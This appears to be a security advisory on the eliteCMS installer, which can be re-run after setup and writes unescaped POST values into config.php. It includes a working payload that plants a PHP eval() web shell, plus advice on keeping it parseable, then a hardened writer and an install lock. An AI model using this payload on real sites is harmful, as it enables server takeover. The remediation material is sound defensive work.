The eliteCMS installer is never locked once installation has finished, so anyone who requests the installer URL again can run the whole installation over from scratch.
A second vulnerability is that the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The four session values are interpolated into double-quoted PHP literals
    // with no escaping; a quote or "?>" in any of them becomes part of the file's code.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to config.php as-is.
    $writer = fopen($file, 'w');
    ...
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are copied from the POST request without any validation at all. If the database-name POST field is sent as:

"?><?php eval($_POST[c]);?><?php

then step 4 writes that one-line backdoor into /admin/includes/config.php.

One practical caveat: PHP compiles config.php as a whole before executing any of it, so the injected fragment has to leave the generated file syntactically valid. Check the file a given payload produces with php -l before relying on it; a fragment that leaves the surrounding define( call unbalanced produces a parse error (and a broken site) rather than a working shell.
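The following is an added example and not eliteCMS code: it reproduces the installer's config-writing pattern with the payload from this write-up, places a hardened writer next to it, and adds the install lock the installer lacks. All function names (buildConfigVulnerable, buildConfigHardened, countOpenTags, installerLocked, lockInstaller) and the install.lock marker are assumptions made for the example.

```php
<?php
// Added example, not eliteCMS code. Function names and the install.lock
// marker are hypothetical; the input array is constructed for the demo.

// Same pattern as the installer's step 4: request values interpolated into
// double-quoted PHP literals with no validation or escaping.
function buildConfigVulnerable(array $cfg): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= "define(\"$key\", \"{$cfg[$key]}\");\n";
    }
    return $out . "?>\n";
}

// Hardened writer: whitelist host/name/user, then let var_export() emit a
// properly quoted single-quoted literal for every value. Quotes and
// backslashes are escaped, and "?>" inside a string literal does not leave
// PHP mode, so nothing the user submits can turn into code.
function buildConfigHardened(array $cfg): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = (string) ($cfg[$key] ?? '');
        if ($key !== 'DB_PASS' && !preg_match('/^[A-Za-z0-9_.\-]{1,64}$/', $value)) {
            throw new InvalidArgumentException("$key contains disallowed characters");
        }
        $out .= 'define(' . var_export($key, true) . ', ' . var_export($value, true) . ");\n";
    }
    return $out;
}

// Count PHP open tags in generated source. A clean config has exactly one;
// any extra open tag means user input has become executable code.
function countOpenTags(string $src): int
{
    $n = 0;
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === T_OPEN_TAG) {
            $n++;
        }
    }
    return $n;
}

// Install lock: the installer must refuse to run once this marker exists,
// and must create it as the last step of a successful installation.
function installerLocked(string $installDir): bool
{
    return is_file($installDir . '/install.lock');
}

function lockInstaller(string $installDir): void
{
    file_put_contents($installDir . '/install.lock', gmdate('c') . "\n", LOCK_EX);
}

// Constructed input: the payload from the write-up placed in DB_NAME.
$input = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'root',
    'DB_PASS'   => 's3cret',
];

$vuln = buildConfigVulnerable($input);
echo $vuln;
// More than one open tag: the eval() block has become real PHP code.
echo "open tags in vulnerable config: " . countOpenTags($vuln) . "\n";

try {
    buildConfigHardened($input);
} catch (InvalidArgumentException $e) {
    echo "hardened writer: " . $e->getMessage() . "\n";
}
$safe = buildConfigHardened(array_merge($input, ['DB_NAME' => 'elitecms']));
echo $safe;
echo "open tags in hardened config: " . countOpenTags($safe) . "\n";

// Re-running the installer: the second run must be refused.
$dir = sys_get_temp_dir() . '/elitecms-install-demo';
@mkdir($dir);
if (installerLocked($dir)) {
    echo "installer is locked, refusing to re-run\n";
} else {
    lockInstaller($dir);
    echo "installation finished, lock written to $dir/install.lock\n";
}
```

Run it twice with php: the first run prints the generated configs and writes the lock, the second run is refused. The lock check belongs at the very top of the installer, before any step is dispatched, and the marker should live where the web server cannot serve it; deleting the install directory after setup is the simpler fix where the deployment allows it.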